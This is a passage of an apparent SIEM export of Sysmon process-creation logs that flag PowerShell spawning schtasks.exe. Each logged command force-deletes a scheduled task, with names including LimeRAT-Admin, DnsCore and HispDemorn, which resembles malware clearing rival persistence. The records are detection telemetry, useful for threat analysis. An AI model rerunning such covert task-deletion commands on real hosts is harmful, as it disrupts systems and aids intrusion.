Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.588",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.281 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010de4f2700} +ProcessId: 6012 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.286091900Z"",""eventRecordID"":""3088"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.281\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010de4f2700}\r\nProcessId: 6012\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.281"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-0010de4f2700}"",""processId"":""6012"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.572",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.205 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010694c2700} +ProcessId: 3620 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for Windows Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} 
+ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.226555400Z"",""eventRecordID"":""3087"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.205\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010694c2700}\r\nProcessId: 3620\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s 
-NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.205"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-0010694c2700}"",""processId"":""3620"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for Windows Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.554",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.179 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010d8492700} +ProcessId: 736 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams 
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.182530600Z"",""eventRecordID"":""3086"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.179\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010d8492700}\r\nProcessId: 736\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.179"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-0010d8492700}"",""processId"":""736"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.533",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.152 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00103b472700} +ProcessId: 7592 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN LimeRAT-Admin /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.154538700Z"",""eventRecordID"":""3085"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.152\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00103b472700}\r\nProcessId: 7592\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN 
LimeRAT-Admin /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.152"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-00103b472700}"",""processId"":""7592"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN LimeRAT-Admin /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:19:30.496",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.128 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-001082442700} +ProcessId: 3460 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HispDemorn /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.130944100Z"",""eventRecordID"":""3084"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.128\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-001082442700}\r\nProcessId: 3460\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.128"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-001082442700}"",""processId"":""3460"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HispDemorn /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.468",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.104 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00101d422700} +ProcessId: 7320 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN werclpsyport /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.107249400Z"",""eventRecordID"":""3083"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.104\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00101d422700}\r\nProcessId: 7320\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.104"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-00101d422700}"",""processId"":""7320"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN werclpsyport /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 